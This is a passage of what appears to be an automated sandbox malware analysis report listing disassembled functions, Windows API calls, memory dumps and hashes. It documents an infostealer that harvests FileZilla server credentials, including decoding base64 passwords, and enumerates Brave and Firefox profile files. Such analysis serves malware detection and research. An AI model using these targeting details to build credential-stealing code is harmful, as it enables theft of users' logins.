                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A40CE
                                • lstrcat.KERNEL32(00000000), ref: 003A40DB
                                • FindNextFileA.KERNEL32(00000000,?), ref: 003A42D9
                                • FindClose.KERNEL32(00000000), ref: 003A42E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 1006159827-1013718255
                                • Opcode ID: 8ebf318f1947860f18923d7d9e327dd7357b31d1e23447bedc9ae69406ac4081
                                • Instruction ID: d9c048a3457816e496ec8600b8cedb29f66afea4af54fc1e705f5cf9013e0a08
                                • Opcode Fuzzy Hash: 8ebf318f1947860f18923d7d9e327dd7357b31d1e23447bedc9ae69406ac4081
                                • Instruction Fuzzy Hash: 8E625C31912A16AFCB23AF64DC49EAFB7B9EF55700F054128F806A7251DB74EE05CB90
                                Function 003A6960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6995
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003A69C8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6A29
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A6A34
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6A5D
                                • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 003A6A77
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6A99
                                • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 003A6AA5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6AD0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6B00
                                • LocalAlloc.KERNEL32(00000040,?), ref: 003A6B35
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6B9D
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6BCD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 313953988-555421843
                                • Opcode ID: 83495e13136c17ca0c848ba425e4a56fae5c458a021ed8b0cfd27cb698519b07
                                • Instruction ID: d44d63838f5d60011f12607949fd52f64b748d10e8f005d232a456a9bf8c80d9
                                • Opcode Fuzzy Hash: 83495e13136c17ca0c848ba425e4a56fae5c458a021ed8b0cfd27cb698519b07
                                • Instruction Fuzzy Hash: C0427F71A11A06AFCB22ABB4DC8EEAF77B9EF15700F095458F901EB251DB34D905CB60
                                Function 0039DB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039DBEF
                                • lstrlen.KERNEL32(003C4CA8), ref: 0039DBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DC17
                                • lstrcat.KERNEL32(00000000,003C4CA8), ref: 0039DC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DC4C
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DC8F
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 0039DCD0
                                • StrCmpCA.SHLWAPI(?,003C17A0), ref: 0039DCF0
                                • StrCmpCA.SHLWAPI(?,003C17A4), ref: 0039DD0A
                                • lstrlen.KERNEL32(003BCFEC), ref: 0039DD1D
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039DD7B
                                • lstrlen.KERNEL32(003C1794), ref: 0039DD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DDA3
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DDAF
                                • lstrlen.KERNEL32(?), ref: 0039DDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 0039DDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DE19
                                • lstrlen.KERNEL32(003C1794), ref: 0039DE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039DE6F
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DE7B
                                • lstrlen.KERNEL32(00F788B8), ref: 0039DE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039DEBB
                                • lstrlen.KERNEL32(003C1794), ref: 0039DEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039DEE6
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DEF2
                                • lstrlen.KERNEL32(00F78BB8), ref: 0039DF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039DF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DFA5
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DFB1
                                • lstrlen.KERNEL32(00F788B8), ref: 0039DFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039DFF4
                                • lstrlen.KERNEL32(003C1794), ref: 0039DFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E022
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039E02E
                                • lstrlen.KERNEL32(00F78BB8), ref: 0039E03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039E06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 0039E0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 0039E0E7
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039E11F
                                • lstrlen.KERNEL32(00F7DD38), ref: 0039E12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E155
                                • lstrcat.KERNEL32(00000000,?), ref: 0039E15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E19F
                                • lstrcat.KERNEL32(00000000), ref: 0039E1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0039E1F9
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039E22F
                                • lstrlen.KERNEL32(00F78C18), ref: 0039E23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039E261
                                • lstrcat.KERNEL32(00000000,00F78C18), ref: 0039E269
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0039E988
                                • FindClose.KERNEL32(00000000), ref: 0039E997
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                • String ID: Brave$Preferences$\Brave\Preferences
                                • API String ID: 1346089424-1230934161
                                • Opcode ID: bbca5f2e1d75fa86fb5834c92556d644a564cdca01c290d8dece5cd9f48bbcca
                                • Instruction ID: d36998c00765df16d6eafdc9ee79acef25e248dccc36731a99e15ca7831f53af
                                • Opcode Fuzzy Hash: bbca5f2e1d75fa86fb5834c92556d644a564cdca01c290d8dece5cd9f48bbcca
                                • Instruction Fuzzy Hash: 2F526D71911A06AFCF22EF65DC8AEAF77B9AF54700F054528F846AB251DB34DC05CB90
                                Function 003960D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 003960FF
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00396152
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00396185
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003961B5
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003961F0
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00396223
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00396233
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: e66bf118650be3c4aee82ea49e143092ce3e7fdd694048f2754f99e47dc62e60
                                • Instruction ID: acc55249727f5cffb1a2734c0fa7bda0b86c260b6546eb7ca9141bb6e19d1b68
                                • Opcode Fuzzy Hash: e66bf118650be3c4aee82ea49e143092ce3e7fdd694048f2754f99e47dc62e60
                                • Instruction Fuzzy Hash: A6522B72912A16AFDF22EBA4DC4AEAF77B9AF54300F154424F905EB251DB34EC05CB90
                                Function 003A6B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6B9D
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6BCD
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6BFD
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6C2F
                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 003A6C3C
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003A6C43
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 003A6C5A
                                • lstrlen.KERNEL32(00000000), ref: 003A6C65
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6CA8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6CCF
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 003A6CE2
                                • lstrlen.KERNEL32(00000000), ref: 003A6CED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6D30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6D57
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 003A6D6A
                                • lstrlen.KERNEL32(00000000), ref: 003A6D75
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6DB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6DDF
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 003A6DF2
                                • lstrlen.KERNEL32(00000000), ref: 003A6E01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6E49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6E71
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 003A6E94
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 003A6EA8
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 003A6EC9
                                • LocalFree.KERNEL32(00000000), ref: 003A6ED4
                                • lstrlen.KERNEL32(?), ref: 003A6F6E
                                • lstrlen.KERNEL32(?), ref: 003A6F81
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 2641759534-2314656281
                                • Opcode ID: f324828c6a6c15032024ab924c5d2e04ab98df51686d3ab7827a87e3e2e5d2fd
                                • Instruction ID: de0f0637aa832cc1a2b7f3d3d6f7146ab453d89794935cebb0a195c8945a9d6f
                                • Opcode Fuzzy Hash: f324828c6a6c15032024ab924c5d2e04ab98df51686d3ab7827a87e3e2e5d2fd
                                • Instruction Fuzzy Hash: 66028071A11A16AFCB22ABB4DC4EEAF7BB9EF15704F095454F802EB241DB34D90587A0
                                Function 003A4B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A4B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A4B7F
                                • lstrlen.KERNEL32(003C4CA8), ref: 003A4B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4BA7
                                • lstrcat.KERNEL32(00000000,003C4CA8), ref: 003A4BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 003A4BFA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: prefs.js
                                • API String ID: 2567437900-3783873740
                                • Opcode ID: 8d34e544d9e0b94bd3347581c4330d9267c2cfed12fc27ba9838979cf7083695
                                • Instruction ID: 950965f7d1bacb0a19ec0573943d5fa6c254a7dffcc56dc6fe3b0afe3b99945d
                                • Opcode Fuzzy Hash: 8d34e544d9e0b94bd3347581c4330d9267c2cfed12fc27ba9838979cf7083695
                                • Instruction Fuzzy Hash: D7923171A11A019FDB26CF29C948B6AB7F5FF46314F1A80ADE809DB2A1D771DC41CB90
                                Function 003A1250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A1291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A12B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A12BF
                                • lstrlen.KERNEL32(003C4CA8), ref: 003A12CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A12E7
                                • lstrcat.KERNEL32(00000000,003C4CA8), ref: 003A12F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 003A133A
                                • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003A135C
                                • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003A1376
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A13AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A13D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A13E2
                                • lstrlen.KERNEL32(003C1794), ref: 003A13ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A140A
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1416
                                • lstrlen.KERNEL32(?), ref: 003A1423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1443
                                • lstrcat.KERNEL32(00000000,?), ref: 003A1451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A147A
                                • StrCmpCA.SHLWAPI(?,00F7DE28), ref: 003A14A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A14E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1535
                                • StrCmpCA.SHLWAPI(?,00F7E538), ref: 003A1552
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A1593
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A15BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A15E4
                                • StrCmpCA.SHLWAPI(?,00F7DC78), ref: 003A1602
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1633
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A165C
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A1685
                                • StrCmpCA.SHLWAPI(?,00F7DDE0), ref: 003A16B3
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A16F4
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A171D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1745
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A1796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A17BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A17F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 003A181C
                                • FindClose.KERNEL32(00000000), ref: 003A182B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
